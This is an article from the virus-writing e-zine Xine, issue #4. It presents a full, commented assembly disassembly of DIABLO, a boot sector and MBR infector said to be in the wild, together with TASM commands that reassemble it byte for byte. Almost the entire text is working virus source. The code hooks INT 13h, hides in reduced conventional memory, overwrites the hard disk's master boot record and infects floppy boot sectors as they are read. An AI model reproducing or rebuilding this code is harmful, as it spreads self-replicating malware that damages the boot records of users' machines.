Copy Link
Add to Bookmark
Report
Xine - issue #4 - Phile 311
/-----------------------------\
| Xine - issue #4 - Phile 311 |
\-----------------------------/
Comment ¾
V Û ß Û Û
I Û Û ßßßßÜ Û Û ÜßßßßÜ
R ÜÜÜÜÛ Û ÜÜÜÛ ÛÜÜÜÜ Û Û Û
U Û Û Û Û Û Û Û Û Û Û
S ßÜÜÜÜÛ Û ßÜÜÜÛÜÜÜ ÛÜÜÜÜß Û ßÜÜÜÜß
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
Disassembled by Int13h/IKX
--------------------------------------------------------------------------
DIABLO is a rather simple BS/MBR infector. This virus is in the wild in
Paraguay, then I decided to disassembly it, because I never published a
disassembly and always there is a first time :) It fits in one sector.
You can get a byte-byte match re-assembly compiling it with TASM 4.0:
tasm /zi /m3 diablo
tlink /v diablo
tdstrip /c diablo
¾
.model tiny
.code
org 0
DIABLO: jmp Virus_Begin
; Here must go the disk parameter block
org 03eh
Virus_Begin:
cli
xor ax,ax
mov ds,ax ; DS=IVT
mov ax,word ptr ds:[004ch] ; AX=INT 13h's offset
mov cs:[07c00h+CD13Offs],ax
mov ax,word ptr ds:[004eh] ; AX=INT 13h's segment
mov cs:[07c00h+CD13Segm],ax
mov ax,word ptr ds:[0412h] ; AH = byte in 0:0x413
mov cx,ax
mov al,byte ptr ds:[0414h] ; AL = the other byte in 0:0x414
xchg ah,al ; AX = total system memory in KBs
sub ax,0002 ; Substract 2KB
mov ch,al
mov word ptr ds:[0412h],cx ; Put the new amount of
mov byte ptr ds:[0414h],ah ; memory, with 2KBs less
mov cl,06 ; For the shifting left
shl ax,cl
mov es,ax ; ES = place for virus
mov word ptr ds:[004eh],ax ; Change INT 13h's segment
mov ax,offset CD13Handler ; New INT 13h's handler
mov word ptr ds:[004ch],ax ; Change INT 13h's offset
sti
xor di,di
mov bx,07c00h ; Points to virus beginning
mov si,bx
mov cx,0100h
push ds
push bx
cld
repz movsw ; Copy virus to ES:DI
push es
mov ax,offset ViralSegment
push ax
retf ; Jmp to viral code at TOM
ViralSegment:
push ds ; Jumped!
pop es ; DS=ES=0
cmp word ptr cs:[0013h],0960h
jnb NonRETF
retf ; jmp to 0:07c00
NonRETF:mov dh,01 ; Head 1
mov cx,000eh ; Cylinder 0, sector 14
cmp byte ptr cs:[01b0h],00
jz Here
mov cx,0002 ; Cylinder 0, sector 2
mov dh,00 ; Head 0
Here: mov dl,cs:[01b0h] ; Drive in dl
mov bx,07c00h ; 7C00 to bx
mov ax,0201h ; Read 1 sec
int 13h
push cs cs ; ES=DS=CS
pop es ds
mov ax,0201h ; Read 1 sector
mov cx,0001h ; Cylinder 0, sector 1
mov dx,0080h ; Head 0, drive C:
mov bx,0200h ; Buffer below the virus
int 13h
mov ax,cs:[0200h]
cmp cs:[0],ax ; ¨Infected?
jz Identic
mov ax,0301h ; Write 1 sector
mov cx,0002h ; Cylinder 0, sector 2
mov dx,0080h ; Head 0, drive C:
mov bx,0200h ; Buffer under virus
int 13h
mov si,03beh ; Copy floppy's stuph
mov di,01beh
mov cx,0021h
repz movsw
mov byte ptr cs:[01b0h],080h
mov ax,0301h ; Write 1 sector
mov cx,0001h ; Cylinder 0, sector 1
mov dx,0080h ; Head 0, drive C:
mov bx,0 ; XOR BX,BX/SUB BX,BX!
int 13h
Identic:mov byte ptr ds:[01b0h],0
nop
retf
CD13Handler:
cmp ah,02h ; Sector read?
Jne NonRead
cmp dl,0 ; Drive A:?
Jne NonRead
pushf ; Simulate the int
call dword Ptr cs:[CD13Offs] ; Call the real Inty
pushf
call LetsCheck
popf
retf 2
NonRead:db 0eah
CD13Offs dw 0
CD13Segm dw 0
LetsCheck:
push ax bx cx dx ds es si di
mov ax,cs
mov es,ax
mov ds,ax
mov ax,0201h ; Read 1 sector
mov cx,0001h ; Cylinder 0, sector 1
mov dx,0000h ; Head 0, drive A:
mov bx,0200h ; Virus's buffer
pushf
call dword Ptr cs:[CD13Offs]
jnc Okis
jmp EternoRetorno
nop
Okis: cmp word ptr cs:[0213h],0960h
Jb EternoRetorno
mov si,01aah
mov di,03aah
mov cx,3
repz cmpsw ; Compare for DIABLO
jnz NonInfected
jmp EternoRetorno ; Already infected
nop
NonInfected:
mov ax,0301h ; Write 1 sector
mov cx,000eh ; Cylinder 0, sector 14
mov dx,0100h ; Head 1, drive A:
mov bx,0200h ; Buffer where the boot was read
pushf
call dword ptr cs:[CD13Offs] ; Real inty
jnc AllOK
jmp EternoRetorno
nop
AllOK: xor si,si
mov di,0200h
mov cx,3
repz movsb
mov si,003eh
mov di,023eh
mov cx,0173h
repz movsb
mov ax,0301h ; Write 1 sector
mov cx,0001h ; Cylinder 0, sector 1
xor dx,dx ; Head 0, drive A:
mov bx,0200h
pushf ; Call the real inty
call dword ptr cs:[CD13Offs]
EternoRetorno:
pop di si es ds dx cx bx ax
ret
db 'DIABLO' ; In spanish, diablo=devil
org 01feh
db 055h,0aah ; Boot mark
org 200h
End DIABLO
